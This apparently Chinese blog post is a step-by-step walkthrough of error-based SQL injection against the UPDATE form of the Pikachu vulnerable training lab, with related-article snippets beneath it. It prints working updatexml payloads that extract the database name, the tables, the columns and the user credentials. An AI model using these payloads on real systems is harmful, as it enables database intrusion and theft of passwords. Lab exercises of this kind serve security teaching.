SQL注入——update注入(pikachu)

最新推荐文章于 2024-07-30 09:06:28 发布
最新推荐文章于 2024-07-30 09:06:28 发布
阅读量3.2k 收藏 5
点赞数 2
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/103987839
版权

第一步:访问目标站点,注册一个账号xiaosan:123456,并登录
在这里插入图片描述
第二步:点击修改个人信息,并用burpsuite工具拦截数据包,修改住址为123456
在这里插入图片描述
拦截数据包,右键发送到Repeater
在这里插入图片描述
第三步:测试注入点
正常请求页面
在这里插入图片描述
输入单引号测试注入点页面
在这里插入图片描述
第四步:经过测试发现不能使用联合查询注入,故改为报错注入获取当前网站所连接的数据库的名字
1’ or updatexml(1,concat(0x7e,database()),0) or’
在这里插入图片描述
第五步:获取当前网站所连接的数据库的版本号
在这里插入图片描述
第六步:获取当前WEB网站所连接的数据库pikachu中全部的表名信息
1’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikachu’)),1) or ‘1
在这里插入图片描述
第七步:获取当前WEB网站所连接的数据库pikachu中表users中的全部列名信息
1’ or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘pikachu’ and table_name=‘users’)),1) or ‘1
在这里插入图片描述
第八步:获取当前WEB网站所连接的数据库pikachu中表users中username、password列的字段内容
1’ or updatexml(1,concat(0x7e,(select group_concat(username,’@’,password) from pikachu.users)),1) or '1
在这里插入图片描述

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。可私信我,邀请你免费进
在这里插入图片描述

W小哥1
关注
专栏目录
【漏洞挖掘】——124、Update注入刨析
Fly_鹏程万里
06-28 133
Update注入即可控的注入点出现在update语句,例如:下面的语句用于向更新数据表的信息,如果此处的value值来自用户且未经过滤处理,则存在SQL注入攻击风险。
sql注入pikachu盲注练习
windStudyer的专栏
05-21 805
sql注入pikachu之盲注练习
update语句_WEB安全之SQL注入(13)——update注入
weixin_39848953的博客
12-09 2629
01前言大家好,我是阿里斯,一名IT行业小白。上一篇文章分享了insert注入,算是一个铺垫,今天我们一起来看看update注入update注入是非常危险一种注入。可能因为payload构造不合理会直接导致整张表都被修改。02update注入update正常语句update users set sex='man' where id=$id;update注入是非常危险的,不管你开发还是安...
SQL注入Update注入
weixin_43765321的博客
03-03 5830
1. MySQLupdate函数 如果我们需要修改或更新MysQL的数据,我们可以使用SQLUPDATE命令来操作。首先更新某一行的一个列。 UPDATE table SET column=mew_value WHERE column= value 为lastname 是"Wilson”的人添加firstname : UPDATE Person SET FirstName = 'Fred WHERE LastName = ‘Wilson’ 更新某一行的若干列 UPDATE table SET c
针对UPDATE语句的SQL注入
最新发布
qq_69100706的博客
07-30 253
在CTF(Capture The Flag)竞赛,针对UPDATE语句的SQL注入是一种利用Web应用程序逻辑漏洞的技术,当应用程序使用用户提供的数据来更新数据库的记录时尤为常见。如果应用程序没有正确地清理或参数化这些用户输入,攻击者就可以注入恶意SQL代码,以操纵数据库更新操作。
SQL注入实战:Update注入
ting_liang的博客
01-21 993
有的程序员在写源代码的时候,只是对查询的sql语句的用户输入内容进行了过滤,忽略了updateupdate表名称set列名称=新值where更新条件;1、sqli-labs less-17关。类型sql语句的用户输入的内容的过滤。二、mysql的Update语句复习。如下图所示,爆出数据库名称。一:Update注入原理。如下图所示,爆出版本信息。
Pikachu SQL注入之insert/update注入
SS_liang的博客
01-11 1953
updateXML函数是一种在XML文档修改或更新指定节点的方法。它在许多编程语言和XML处理库都有实现。updateXML函数通常接受三个参数:XML文档、XPath表达式和要更新的值。XML文档是要进行修改的原始XML数据。XPath表达式用于定位要更新的节点。它可以是简单的节点路径,也可以使用更复杂的条件和过滤器来选择节点。要更新的值是要设置给节点的新值。当调用updateXML函数时,它会根据XPath表达式找到匹配的节点,然后将其值设置为指定的新值。
PikachuSQL注入
qq_46430168的博客
06-29 420
PikachuSQL注入 1. 数字型注入       首先发现界面只有一个下拉框和提交框,尝试选择不同下拉框的选项,发现返回不同的值,但是url并无任何变化,初步推断出使用post传输并且后台语句可能为select xxx,xxx from xxx where id=1-6。       找列数,id=3 order by n#,当n>2时返回错误,等于2时返回正确,说明select语句查询结果有2列     &n
SQL注入(三):pikachu---updatexml、insert、delete
天威一号
10-26 1061
1、updatexml函数报错信息实现sql注入: 构造payload: ①爆破数据库版本 ' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#' select * from 表名 username='' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#' ②爆破用户名 ...
Pikachu漏洞练习平台实验——SQL注入
m0_73826804的博客
02-22 2817
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图下面的语句,这是条能被正常执行的SQL语句,导致表的数据都会输出。
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1664
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
OWASP之SQL注入
zzhokok的博客
07-26 775
原理:程序未对输入参数做限制,用户输入的数据可带入数据库查询 四种注入分类 三种提交方式 九种注入方式
insert/update注入
Ethan024的博客
03-30 1015
insert/update注入 实验环境: 皮卡丘靶场—insert/update注入 原理: insert注入(注册新用户): 后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4) insert语句一般通过or进行闭合: insert into member(userna
2021-07-08 CTFer成长之路-SQL注入-UPDATE 注入
热门推荐
时光隧道
07-08 5万+
一:UPDATE 注入 UPDATE语句适用于数据库记录的更新,如用户修改自己的文章、介绍信息、更新信息等。UPDATE语句的语法如下: 例如,以注入点位于SET后为例。一个正常的update语句如图1-2-41,可以看到,原先表wp_user第2行的id数据被修改。 当id数据可控时,则可修改多个字段数据,形如 update wp_user set id=3,user='xxx' user = '23' 其余位置的注入点利用方式与SELECT注入类似,这里不再赘述。 ...
update注入的一个小trick
vspiders的博客
06-18 343
0x01 Mysql特性Mysqlupdate语句的定义如下:UPDATE table_name SET field1 = new-value1, field2 = new-value2 [WHERE Clause]但是偶然发现,field1与field2两字段可以同名,并且UPDATE之后的字段内容会以field2的赋值为准。如上图,Link字段被赋值了两次,最终的该Link字段的内容以最后...
渗透测试之Update注入学习笔记
我的学习笔记
02-28 1525
参考实验:http://www.hetianlab.com/expc.do?ce=572fa9e9-7eb1-4928-bfe3-eaa444eab1e0sqlupdateattack.py #!/usr/bin/python # -*- coding: utf-8 -*- import HTMLParser impo...
Pikachu的”insert/update注入
weixin_50339082的博客
06-15 2367
Pikachu的”insert/update注入 一、相关函数 UpdateXML(xml_target,xpath_expr,new_xml) #此函数将xml_target用xpath_expr路径匹配到XML片段用new_xml替换,然后返回更改后的XML。 #xml_target被替换的部分与xpath_expr用户提供的XPath表达式匹配。 #如果找不到表达式匹配 xpath_expr项,或者找到多个匹配项,则该函数返回原始 ml_targetXML片段。 #所有三个参数都应为字符串。 E
pikachu sql注入“insert/update注入
IPIutol的博客
09-06 119
基础语句:id=x' or updatexml(1,concat(0x7e,(payload)),0) #substr(string,start<,length>)从string 的start位置开始提取字符串。length:待提取的字符串的长度,若length为一下情况时,返回整个字符串的所有字符。@@datadir:爆数据库文件所在位置。4、length大于字符串的长度。updatexml式注入。1、length不指定。3、length为负值。2、length为空。
pikachu sql注入
08-11
引用和提到了一种叫做SQL注入的攻击方式。SQL注入是一种利用应用程序对用户输入的不当处理导致数据库执行非预期操作的漏洞。在引用和提到的例子,攻击者利用了应用程序存在的漏洞,通过在用户输入插入恶意的SQL代码,使数据库执行了恶意操作。具体来说,在这两个例子,攻击者尝试获取pikachu数据库的用户信息。 如果你对pikachu SQL注入感兴趣,我建议你参考引用的文章。这篇文章详细介绍了字符型SQL注入的过程和防范措施,可以帮助你更好地理解和应对这种类型的攻击。123 #### 引用[.reference_title] - *1* *2* [PiKachu之Sql (SQL注入)通关 2022](https://blog.csdn.net/av11566/article/details/124259545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [pikachu-sql注入](https://blog.csdn.net/Resets_/article/details/129901110)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值